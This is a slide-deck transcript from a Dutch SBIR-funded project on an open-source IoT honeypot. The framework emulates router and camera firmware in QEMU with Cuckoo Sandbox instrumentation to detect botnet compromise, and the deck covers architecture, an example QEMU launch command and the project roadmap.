ncsc one: iot honeypot · 2018. 12. 11. · cuckoo sandbox 4. project 5. architecture 6. offline...
TRANSCRIPT
NCSC One: IoT HoneypotPieter Jansen & Jurriaan Bremer
On the agenda:
1. Introduction2. SBIR3. Cuckoo Sandbox4. Project5. Architecture6. Offline demo7. Roadmap
Introduction
Pieter Jansen
- CEO @ Cybersprint- https://cybersprint.com- Team of 25 enthusiasts- Since 2015- 100% Dutch
- Digital Risk Protection services
Jurriaan Bremer
- CEO, Hatching- https://hatching.io/
- Lead Developer, Cuckoo Sandbox- https://cuckoosandbox.org/
- 6+ years development on Cuckoo
- Growing R&D team
SBIRThis SBIR project is co-fundedby the Internal Security Fundof the European Union
Balancing Security and Mobility
SBIR
- EU co-funded Project
- SBIR stage 1 (feasibility)
- SBIR stage 2 (realisation)
- SBIR stage 3 (valorisation)
- https://www.rvo.nl/subsidies-regelingen/sbir
You are here
Cuckoo Sandbox
Cuckoo Sandbox
- Leading open source automated malware analysis project- https://cuckoosandbox.org/
- Widely used throughout the security community
- Hatching is the driving force behind the majority of Cuckoo innovations
- Cuckoo forms basis of the IoT Honeypot project
Project
- Goal: develop a firmware-based, open source Internet of Things (IoT) honeypot framework
- Consumer network devices, e.g., those used by NCSC.NL personnel at home- IP camera’s, smart devices, etc
- Reason: Mirai, Haijime, etc..
Project [1/2]
Hajime Botnet Makes a Comeback With Massive Scan for MikroTik
Routers
Project overview - replication vs emulation
Replication-approach
1. Connect to an IoT device2. Store the conversation (example: HTML files)3. Spin up a service on the same port/protocol4. Playback the earlier captured conversation
Replication-approach - conclusions
Easy to set up fake environments
Did not go past login screen
Was not convincing enough for attackers
Would only capture attempts, not infections
Project
- Replication alternative did not work
- Goal: create open source IoT Honeypotting framework- Goal: detect large-scale IoT compromise campaigns- Goal: detect new threats, generate new IoCs
- Default credentials, exploits, etc
- Scales: run dozens of IoT devices using a single server- Without requiring the original hardware- Relatively low cost & maintenance effort
[2/2]
Existing projects
- pyREbox, PANDA, DECAF, ISP RAS.
- x86-only (pyREbox) and x86/ARM (PANDA, different use-case)
- IoT firmware often ARM/MIPS/etc
High-level project overview
- Emulate IoT firmware using QEMU- Expose listening network services
- Either to internal networks or public IPv4 / IPv6 addresses
- Instrument behavioral aspects of running firmware- …- Wait for device to be compromised!
Goal of the project?
- Once a device is compromised, investigate :-)- Got system call traces and PCAPs- Reconstruct traffic to isolate exploit and/or payload
- Alternative use-case: honey tokens- Intentionally vulnerable devices with interesting names (eg FREDERIKSKAZERNE CAM51)- Notifies owners if attackers abuse it
Architecture
IoT Honeypot Architecture
QEMU
Loading of firmware non-trivial:
- In practice most firmware is non-x86: ARM & MIPS- Needs specific QEMU command-line parameters etc
Instrumentation of QEMU interesting:
- Not so much existing research on non-x86 QEMU VMI- Virtual Machine Introspection
- Instrumentation required to learn what device is doing- E.g., logging system calls such as execve(2)
Gathering results
- We obtain network traffic from the outside- We obtain system calls from the device- Realtime data processing- Results stored for later research- Alerts emitted to custom Dashboard
- Known vulnerability was used- ...
QEMU Command-line usage MIPS image
/home/jbr/git/quailbox-qemu/build/mips-softmmu/qemu-system-mips
-kernel /home/jbr/.quailbox/kernels/vmlinux-3.18.120-4kc-malta-cuckoo
-nographic
-netdev tap,id=net0,ifname=tap_qemu,script=no,downscript=no
-M malta -m 512
-hda /home/jbr/.quailbox/images/ext2fs-for-netgear-wnap210.image
-device e1000,netdev=net0
-display none
-append console=ttyS0
rw root=/dev/sda init=/sbin/init
QEMU Tiny Code Generator (“TCG”)
- Efficient engine for translating ARM/MIPS/etc into an IL- Intermediate Language
- IL translated into the native Host code, e.g., x86- Needs customization to add our VMI
- Syscall capturing for ARM+MIPS- Linux Kernel modifications & tracing WIP- Memory tracking & dumping logic
- Additional changes required for new bug classes- Instrumentation for specific applications etc
Realtime tcpdump processing
- Log & process HTTP(s) requests from the outside- Present network traffic to ruling engines
- Suricata / Snort- Cuckoo / Proprietary Signatures
Offline Demo
X
X
Roadmap
Roadmap
- Create web interface for managing virtual IoT environments- “Load” support for many more firmware images- Tailored QEMU VMI support for:
- Different CPU architectures- Different known versions of Linux kernel for allowing in-depth VMI
- E.g., through Volatility / Rekall integration
- Documentation of more relevant bug classes- Capability for identifying said bug classes
- Protection against QEMU breakouts..- Interaction through simulation of peripherals like camera/files/sensors- OT/SCADA/ICS applications (virtual Borssele)- So much more.. ;-)
Valorization
Valorization: Commercial Applications
- Fuzzing as a Service- Provide security testing services for hardware providers, allowing large
scale/automated testing for any firmware
- Commercial / open source bespoke additions for specific use-cases- OT-applications, applications for non-standard firmware
- Hosting of virtual IoT Environments- Creating virtual 'digital twin' of sensitive IoT environments for research purposes- Collect threat intelligence to support adversary attribution research
How you can help
1. Share your firmware
2. Provide testing grounds
3. Spread the word!
Credits
The HoneyNED project team
Andrei Costin ([email protected]) Assistant Professor inCybersecurity/IoT - welcomes research and collaboration opportunities